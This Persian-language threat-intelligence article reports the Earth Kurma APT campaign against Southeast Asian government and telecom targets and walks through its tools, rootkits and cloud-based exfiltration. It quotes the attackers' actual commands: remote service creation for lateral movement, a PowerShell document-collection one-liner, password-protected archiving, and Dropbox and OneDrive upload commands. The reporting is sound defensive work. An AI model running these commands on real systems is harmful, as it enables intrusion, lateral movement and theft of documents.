خانه » گروه Earth Kurma، جنوب شرق آسیا را با روت‌کیت‌ها و ابزارهای مبتنی بر فضای ابری هدف قرار داده است!

گروه Earth Kurma، جنوب شرق آسیا را با روت‌کیت‌ها و ابزارهای مبتنی بر فضای ابری هدف قرار داده است!

توسط Vulnerbyt_News
Earth Kurma APT Campaign Targets Southeast Asian Government, Telecom Sectors گروه والنربایت vulnerbyte

بخش‌های دولتی و مخابراتی در جنوب شرق آسیا از ژوئن ۲۰۲۴ هدف کمپینی پیشرفته از سوی گروه تهدید پیشرفته (APT) به نام Earth Kurma قرار گرفته‌اند. این گروه با بهره‌گیری از بدافزارهای سفارشی، روت‌کیت‌ها و سرویس‌های ابری، جنوب شرق آسیا را با هدف سرقت داده‌ها مورد حمله قرار داده است. کشورهای فیلیپین، ویتنام، تایلند و مالزی از جمله اهداف اصلی بوده‌اند.

Earth Kurma APT Campaign Targets Southeast Asian Government, Telecom Sectors گروه والنربایت vulnerbyte
پراکندگی کشورهای مورد هدف Earth Kurma

این حملات به دلیل جاسوسی هدفمند، سرقت اطلاعات ورود به سیستم، ایجاد ماندگاری با روت‌کیت‌های سطح کرنل و استخراج داده‌ها از طریق پلتفرم‌های ابری مورد اعتماد، خطری جدی برای سازمان‌ها ایجاد کرده‌اند. فعالیت‌های این گروه به نوامبر ۲۰۲۰ بازمی‌گردد و از سرویس‌هایی مانند Dropbox و Microsoft OneDrive برای انتقال داده‌های حساس با ابزارهایی نظیر TESDAT و SIMPOBOXSPY استفاده شده است.

زنجیره حمله گروه Earth Kurma

زنجیره حمله این گروه در تصویر زیر نشان داده‌شده‌است:

Earth Kurma APT Campaign Targets Southeast Asian Government, Telecom Sectors گروه والنربایت vulnerbyte

روش‌های اولیه نفوذ گروه در این حملات مشخص نشده است، زیرا تحلیل‌ها سال‌ها پس از آلودگی اولیه قربانیان آغاز شده است.

مرحله گسترش در شبکه

در این مرحله، مهاجمان از ابزارهای متعددی برای اسکن زیرساخت‌های قربانیان و استقرار بدافزار از جمله NBTSCAN، Ladon، FRPC، WMIHACKER و ICMPinger استفاده کرده‌اند. همچنین، کی‌لاگر KMLOG برای سرقت اطلاعات ورورد به سیستم قربانیان مستقر شده است.

برای بررسی زیرساخت‌های قربانیان، مهاجمان از ابزار ICMPinger بهره برده‌اند که یک ابزار ساده اسکن شبکه مبتنی بر پروتکل ICMP است و وضعیت فعال بودن میزبان‌ها را آزمایش می‌کند. این ابزار پس از اتمام عملیات حذف می‌شود.

Earth Kurma APT Campaign Targets Southeast Asian Government, Telecom Sectors گروه والنربایت vulnerbyte
استفاده از ICMPinger

ابزار متن‌باز Ladon نیز برای بازرسی زیرساخت‌ها استفاده شده است. برای جلوگیری از شناسایی، Ladon در یک لودر بازتابی که با PyInstaller کامپایل شده، پنهان شده و کلیدهای XOR برای رمزگشایی پیلود در نمونه‌های مختلف متفاوت است. فریم‌ورک متن‌باز Ladon پیش‌تر به گروه هکری چینی TA428 (معروف به Vicious Panda) نسبت داده شده بود.

Earth Kurma APT Campaign Targets Southeast Asian Government, Telecom Sectors گروه والنربایت vulnerbyte
فرایند بازتابی بارگذاری Ladon

برای گسترش در شبکه، مهاجمان از ابزار متن‌باز WMIHACKER استفاده کرده‌اند که دستورات را از طریق پورت ۱۳۵ بدون نیاز به پروتکل SMB اجرا می‌کند.

Earth Kurma APT Campaign Targets Southeast Asian Government, Telecom Sectors گروه والنربایت vulnerbyte
استفاده از ابزار WMIHACKER

در برخی موارد، دستورات از طریق پروتکل SMB (مانند دستور «net use») برای بازرسی زیرساخت و استقرار بدافزار اجرا شده‌اند. دستورات استفاده شده به شرح زیر است:

				
					C:\Windows\system32\cmd.exe /C sc.exe -a 172.20.40.0-172.20.40.255 -t 500 -f lg.txt -c 1 -o 100 –n
C:\Windows\system32\cmd.exe /C net use \\172.20.40.41\c$ {password} /u:{user}
C:\Windows\system32\cmd.exe /C copy vdmsc.dll \\172.20.40.41\c$\users\{user} \videos
C:\Windows\system32\cmd.exe /C copy msv.dat \\172.20.40.41\c$\windows\system32
C:\Windows\system32\cmd.exe /C sc \\172.20.40.41 create katech binpath= "cmd /c start /b rundll32.exe c:\users\{user}\videos\vdmsc.dll,Init"
C:\Windows\system32\cmd.exe /C sc \\172.20.40.41 start katech
C:\Windows\system32\cmd.exe /C sc \\172.20.40.41 delete katech
C:\Windows\system32\cmd.exe /C net use \\172.20.40.41\c$ /del /y
				
			

کی‌لاگر KMLOG نیز برای سرقت اطلاعات ورود به سیستم به کار رفته است. این ابزار ساده، تمام کلیدهای فشرده‌شده را در فایلی با نام “Appdata%\Roaming\Microsoft\Windows\Libraries\infokey.zip%” ذخیره می‌کند.

Earth Kurma APT Campaign Targets Southeast Asian Government, Telecom Sectors گروه والنربایت vulnerbyte
لاگ های ذخیره شده مربوط به KMLOG

مرحله ماندگاری

در مرحله ماندگاری، مهاجمان لودرهای مختلفی از جمله DUNLOADER، TESDAT و DMLOADER را برای حفظ حضور خود در سیستم‌ها مستقر کرده‌اند. این لودرها پیلودهای فایل را در حافظه بارگذاری و اجرا می‌کنند. لودرها سپس برای استقرار بدافزارهای بیشتر و استخراج داده‌ها از طریق سرویس‌های ابری عمومی مانند Dropbox و OneDrive استفاده شده‌اند.

در برخی موارد، روت‌کیت‌هایی مانند KRNRAT و Moriya توسط لودرها نصب شده‌اند تا از اسکن‌های امنیتی عبور کنند.

  • روت‌کیت Moriya پیش‌تر در کمپین جاسوسی TunnelSnake علیه سازمان‌هایی در آسیا و آفریقا مشاهده شده بود. این روت‌کیت بسته‌های ورودی TCP را بررسی می‌کند و در صورت وجود پیلود مخرب، شل‌کد را در فرآیند exe تزریق می‌نماید.

روت‌کیت KRNRAT، که از ترکیب پنج پروژه متن‌باز ساخته شده، قابلیت‌هایی مانند دستکاری فرآیندها، مخفی‌سازی فایل‌ها، اجرای شل‌کد، پنهان‌سازی ترافیک و ارتباط با سرور فرمان و کنترل (C2) را ارائه می‌دهد. این روت‌کیت یک عامل کاربر (User-Mode Agent) را به‌عنوان بکدور بارگذاری کرده و همانند Moriya در svchost.exe تزریق می‌کند تا پیلود بعدی را از C2 دریافت نماید.

مرحله جمع‌آوری و استخراج داده‌ها

در مرحله جمع‌آوری و استخراج داده‌ها، دو ابزار سفارشی برای انتقال اسناد خاص به سرویس‌های ابری مهاجمان، مانند Dropbox و OneDrive استفاده شده است.

پیش از استخراج، لودر TESDAT دستوراتی را اجرا کرده که اسناد با پسوندهای .pdf، .doc، .docx، .xls، .xlsx، .ppt، و .pptx را جمع‌آوری می‌کند. این اسناد ابتدا در پوشه‌ای جدید به نام tmp ذخیره شده و سپس با استفاده از WinRAR و رمز عبور خاصی آرشیو می‌شوند. دستورات اجرا‌شده شامل موارد زیر است:

				
					C:\Windows\system32\cmd.exe /C dir c:\users
C:\Windows\system32\cmd.exe /C mkdir tmp
C:\Windows\system32\cmd.exe /C powershell.exe "dir c:\users -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt' , '*.pptx'| where LastWriteTime -gt (Get-date).AddDays(-30) | foreach {cmd /c copy $_ /y c:\users\{username}\documents\tmp};echo Finish!"
C:\Windows\system32\cmd.exe /C c:\"program files"\winrar\rar.exe a -p{password} -v200m c:\users\{username}\documents\{hostname} c:\users\{username}\documents\tmp -ep
C:\Windows\system32\cmd.exe /C rmdir /s /q tmp
				
			

ابزار SIMPOBOXSPY برای استخراج داده‌ها به کار رفته و فایل‌های آرشیو را با توکن دسترسی مشخص به Dropbox آپلود می‌کند. این ابزار، یک آپلودکننده عمومی Dropbox است که در گزارش‌های مرتبط با گروه ToddyCat ذکر شده است. دستور مرتبط با این ابزار به شرح زیر است:

				
					dilx.exe {access_token} [-f {file_1} {file_2} ...]
				
			

در صورتی که پارامتر “-f” مشخص نشود، فایل‌هایی با پسوندهای .z، .001، .002 تا .128 یا .7z در پوشه جاری آپلود می‌شوند. پس از آپلود، پوشه‌ای با نام تاریخ و زمان جاری در Dropbox ایجاد می‌شود.

Earth Kurma APT Campaign Targets Southeast Asian Government, Telecom Sectors گروه والنربایت vulnerbyte
نتیجه دستور اجرا شده

ابزار دیگر، ODRIZ، که در سال ۲۰۲۳ شناسایی شده، داده‌های جمع‌آوری‌شده را با استفاده از توکن Refresh مشخص در OneDrive آپلود می‌کند. این ابزار فایل‌هایی با الگوی *.z.* در پوشه جاری را آپلود می‌نماید. دستور مربوط به این ابزار به شرح زیر است:

				
					odriz.exe {refresh_token}
				
			
Earth Kurma APT Campaign Targets Southeast Asian Government, Telecom Sectors گروه والنربایت vulnerbyte
کد مربوط به ابزار ODRIZ

پس از جمع‌آوری اسناد در آرشیو رمزگذاری‌شده، که معمولا با نام میزبان نام‌گذاری می‌شود، آرشیو RAR از طریق پروتکل SMB به پوشه‌ای در مسیر “\\\DC_server\sysvol{domain}\Policies{ID}\user” کپی می‌شود.

سخن پایانی

این گروه همچنان فعال است، کشورهای جنوب شرق آسیا را هدف قرار می‌دهد و توانایی سازگاری با محیط‌های قربانی و حفظ حضور مخفیانه را دارد. مهاجمان از کدهای کمپین‌های قبلی استفاده کرده، ابزارها را سفارشی‌سازی می‌کنند و گاهی از زیرساخت قربانی برای دستیابی به اهدافشان بهره می‌برند.

منابع:

همچنین ممکن است دوست داشته باشید

پیام بگذارید